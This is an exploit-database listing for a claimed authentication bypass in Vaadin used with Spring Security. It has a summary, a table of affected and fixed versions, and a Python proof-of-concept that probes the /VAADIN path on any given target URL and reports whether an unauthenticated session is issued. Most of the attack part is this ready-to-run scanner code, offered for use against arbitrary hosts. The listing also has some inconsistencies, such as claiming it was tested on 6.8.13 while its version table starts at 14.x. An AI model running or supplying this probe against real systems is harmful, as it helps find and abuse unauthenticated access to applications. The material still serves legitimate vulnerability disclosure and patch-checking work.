## https://sploitus.com/exploit?id=PACKETSTORM:218596
==================================================================================================================================
| # Title : Vaadin 25.x Authentication Bypass |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://vaadin.com/ |
==================================================================================================================================
[+] Summary : This vulnerability affects multiple versions of Vaadin ( 6.8.13 ,14.x, 23.x, 24.x, and 25.x) when used with Spring Security, due to inconsistent path pattern matching on reserved framework routes.
Accessing the /VAADIN endpoint without a trailing slash can bypass security filters, allowing unauthenticated users to trigger framework initialization and create valid sessions without proper authorization.
[+] It was successfully tested on : 6.8.13
[+] This impacts Vaadin versions:
14.0.0 โ 14.14.0 โ fixed in 14.14.1
23.0.0 โ 23.6.6 โ fixed in 23.6.7
24.0.0 โ 24.9.7 โ fixed in 24.9.8
25.0.0 โ 25.0.1 โ fixed in 25.0.2+
[+] Older unsupported branches (10โ13 and 15โ22) are also affected and require upgrading to supported releases.
[+] A Python proof-of-concept scanner demonstrates the issue by requesting the /VAADIN endpoint and checking for signs of session creation.
If the server returns HTTP 200 along with a JSESSIONID cookie, the application is flagged as potentially vulnerable.
Otherwise, responses like 401 or 302 suggest that authentication protections are still active.
[+] POC :
import requests
import sys
def check_vaadin_auth_bypass(url):
"""
Checks if a Vaadin application is vulnerable
by accessing the /VAADIN endpoint without a trailing slash.
"""
target_url = url.rstrip('/') + '/VAADIN'
headers = {
'User-Agent': 'indoushka-Scanner'
}
try:
print(f"[*] Checking {target_url}")
response = requests.get(target_url, headers=headers, allow_redirects=False, timeout=10)
if response.status_code == 200 and 'JSESSIONID' in response.cookies:
print(f"[!] VULNERABLE: Authentication bypass succeeded on {target_url}")
print(f"[!] New session created: {response.cookies.get('JSESSIONID', 'Not Found')}")
return True
elif response.status_code == 200:
print(f"[-] Got HTTP 200 but no new JSESSIONID cookie. Might not be vulnerable or already patched.")
elif response.status_code == 401 or response.status_code == 302:
print(f"[-] Not vulnerable. Received HTTP {response.status_code} (authentication required or redirect).")
else:
print(f"[-] Unexpected response: HTTP {response.status_code}")
except requests.exceptions.RequestException as e:
print(f"[ERROR] Could not connect to {target_url}: {e}")
return False
if __name__ == "__main__":
if len(sys.argv) != 2:
print("Usage: python poc.py <target_base_url>")
print("Example: python poc.py https://example.com")
sys.exit(1)
target = sys.argv[1]
check_vaadin_auth_bypass(target)
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================